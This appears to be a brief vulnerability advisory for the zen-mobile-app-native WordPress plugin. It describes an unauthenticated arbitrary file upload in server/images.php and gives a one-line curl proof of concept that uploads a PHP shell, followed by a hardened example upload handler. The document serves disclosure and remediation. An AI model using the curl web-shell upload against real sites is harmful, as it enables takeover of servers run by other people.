The code in ./zen-mobile-app-native/server/images.php doesn’t require authentication and doesn’t check that the user is allowed to upload content. It also doesn’t sanitize the uploaded file against executable code.
$ curl -F "file=@/var/www/shell.php" "http://example.com/wp-content/plugins/zen-mobile-app-native/server/images.php"
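For comparison, an upload handler that performs the three checks described above as missing (authentication, authorization and file validation). This is an added example, not the plugin's code or a vendor fix. It assumes the upload is routed through WordPress's admin-ajax instead of a directly reachable script, and the action name `zen_image_upload`, the function name and the `_wpnonce` field are hypothetical; the `file` field name is taken from the request above.

```php
<?php
// Added example, not the plugin's code. Assumes the handler is loaded by
// WordPress as part of a plugin. 'zen_image_upload' and '_wpnonce' are
// hypothetical names chosen for this illustration.

// Only the authenticated hook is registered. Without a matching
// wp_ajax_nopriv_ hook, anonymous requests never reach the handler.
add_action( 'wp_ajax_zen_image_upload', 'zen_handle_image_upload' );

function zen_handle_image_upload() {
    // 1. Authorization: the logged-in user must be allowed to upload media.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }

    // 2. CSRF: the request must carry a valid nonce for this action.
    check_ajax_referer( 'zen_image_upload', '_wpnonce' );

    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( 'No file uploaded', 400 );
    }

    // 3. Validation: allow-list of image types, checked against the file
    //    name's extension and the image type detected from the content.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'Only JPEG, PNG or GIF images are accepted', 415 );
    }

    // 4. Storage: WordPress moves the file into the uploads directory under
    //    a sanitized, unique name and enforces the same allow-list again.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $overrides = array( 'test_form' => false, 'mimes' => $allowed );
    $result    = wp_handle_upload( $_FILES['file'], $overrides );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

With a handler like this, the unauthenticated request shown above is rejected before the file is processed, and a `.php` upload from an authorized user fails the allow-list check.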